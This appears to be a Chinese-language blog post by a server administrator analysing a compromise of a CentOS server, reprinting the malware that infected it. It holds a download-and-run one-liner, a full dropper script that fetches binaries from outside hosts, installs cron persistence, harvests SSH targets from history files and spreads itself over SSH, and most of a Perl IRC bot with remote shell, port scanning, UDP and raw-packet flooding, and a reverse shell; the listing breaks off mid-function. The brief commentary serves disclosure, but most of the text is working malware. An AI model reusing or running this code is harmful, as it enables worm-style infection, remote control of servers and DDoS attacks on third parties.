最近一段时间,所使用的CentOS服务器被不明人士安放了木马程序;观察发现该木马程序是用来发起DDOS攻击的肉鸡程序,在发作时占用绝大部分的网络带宽。
起点:
wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*
执行完上面的代码以后,你的机器就已经中招了。以下是所下载和执行的代码:
plm=`ps x |grep httpd.conf|grep -v grep`
plt=`cat /proc/cpuinfo|grep aes`
#pgrep perl |sed '1d;' |xargs kill -9
if [ "$plm" != "" ]
then
echo
else
rm -rf apache* httpd.conf* /usr/local/bin/sysmonitord
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
#/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
kill -9 `ps x|grep stratum|awk '{print $1}'`
kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
#killall -9 sysmonitord sh wget curl
crontab -r
if [ -f libcurl.so.4 ] ; then
echo
else
wget 223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
wget 223.255.145.158/libcurl.so.4 > /dev/null 2>&1
wget 223.255.145.158/libssl.so.6 > /dev/null 2>&1
wget 223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
wget 223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
curl -O http://223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
curl -O http://223.255.145.158/libssl.so.6 > /dev/null 2>&1
curl -O http://223.255.145.158/libcurl.so.4 > /dev/null 2>&1
curl -O http://223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
curl -O http://223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
export LD_LIBRARY_PATH=`pwd`
fi
curl -O http://65.254.63.20/apache > /dev/null 2>&1
wget -qO - http://65.254.63.20/.mail | perl
curl -O http://65.254.63.20/.mail > /dev/null 2>&1
fetch http://65.254.63.20/.mail > /dev/null 2>&1 ; perl .mail ; rm -rf .mail*
wget http://65.254.63.20/apache > /dev/null 2>&1
wget http://65.254.63.20/httpd.conf > /dev/null 2>&1
curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
if [ -f /etc/cron.daily/anacron ] ; then
echo
else
wget -O /etc/cron.daily/anacron http://65.254.63.20/a > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron
curl -O http://65.254.63.20/a > /dev/null 2>&1; mv a /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron
fi
chmod +x apache
(exec ./apache -c httpd.conf &> /dev/null &)
sleep 2
rm -rf wget* apache* httpd*
fi
if [ "$plm" != "" ]
then
echo
else
if [ "$plt" != "" ]
then
echo
else
wget http://65.254.63.20/apacheaes > /dev/null 2>&1
curl -O http://65.254.63.20/apacheaes > /dev/null 2>&1
wget http://65.254.63.20/httpd.conf > /dev/null 2>&1
curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
chmod +x apacheaes
mv apacheaes apache2
(exec ./apache2 -c httpd.conf &> /dev/null &)
fi
fi
if [ -f /tmp/.h ] ; then
echo
else
cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h > /dev/null 2>&1
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*") > /dev/null 2>&1 ; done
fi
history -rc
以上shell脚本代码主要是下载并执行相关代码,以启动相应功能的服务进程;然后分析相应的日志/历史文件,从中解析出相关IP地址,并尝试登录到相应IP地址并再次执行上述动作(即:下载并执行上述shell脚本,以达到感染其他机器的目的)。
上面的 wget http://65.254.63.20/.mail | perl 所下载并执行的perl代码:
#!/usr/bin/perl
my @mast3rs = ("G");
my @hostauth = ("localhost");
my @admchan=("#x");
my @server = ("213.152.3.19");
$servidor= $server[rand scalar @server] unless $servidor;
my $xeqt = "!say";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/bin/httpd");
my @nickname = ("V");
my @xident = ("xxx");
my @xname = (`uname -a`);
#################
# Random Ports
#################
my @rports = ("8080");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1??9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
# xeQt
#my $nick = "Power";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'PowerBots (C) GohacK';
my $echo = "`echo` $1";
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
sub getnick {
return "$nickname[rand scalar @nickname]".int(rand(20000));
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
#print "HOST=$host, PORT=$port, PATH=$path\n";
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") {
$b1 = $buf;
$buf =~ s/.+?\015?\012\015?\012//s;
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
# print "CODE=$main::http_get_result\n$b1\n";
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 2;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "".$Mrx."");
}
elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
notice("$pn", "\001PONG\001");
}
if (grep {$_ =~ /^\Q$hostnam3\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @mast3rs) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^!(.*)/){
ircase("$pn","$chan","$1");
}
if ($args =~ /^(\Q$meunick\E|\Q$xeqt\E)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1");
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
$meunick = getnick();
nick("".$meunick."-");
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@admchan){
sendraw("JOIN $canal muietie");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork)
{
exit;
}
else
{
# Quick scan
if ($funcarg =~ /^ps (.*)/) {
my $hostip="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1");
}
}
# NMAP, lol
elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/)
{
my $hostname="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3");
foreach my $porta ($portstart..$portend)
{
my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002");
}
}
# Remove
elsif ($funcarg =~ /^rm/)
{
system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Quickdel)\002\00314 Removed files and folders ");
}
# Version
elsif ($funcarg =~ /^version/)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Version)\002\00314 $version ");
}
# Download
elsif ($funcarg =~ /^down\s+(.*)\s+(.*)/)
{
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Download)\002\00314 Page: $2 (File: $1)") if ($xstats);
}
# Udp
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotese;
my $fim = time + $tempo;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP DDoSing)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
if ($xstats)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Sendt\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");
}
}
# Backconnect
elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
system("cd /tmp/.mrx");
close(STDIN);
close(STDOUT);
close(STDERR);
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^echo/) {
system("echo $meunick > `pwd`/botnick");
msg("done");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^jump\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^rj\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^rp\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^quit/) {
quit();
}
elsif ($case =~ /^rand/) {
my $novonick = getnick();
nick("$novonick");
}
elsif ($case =~ /^stat (.*)/) {
if ($1 eq "on") {
$xstats = 1;
msg("$printl", "Satus enabled");
} elsif ($1 eq "off") {
$xstats = 0;
msg("$printl", "Status disable");
}
}
elsif ($case =~ /^bang (.*)/) {
if ($1 eq "on") {
$pacotes = 1;
msg("$printl", "[x] Bang mode enabled") if ($xstats == "1");
} elsif ($1 eq "off") {
$pacotes = 0;
msg("$printl", "[x] Bang mode disabled") if ($xstats == "1");
}
}
}
sub shell {
return unless $shellaccess;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c >= "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
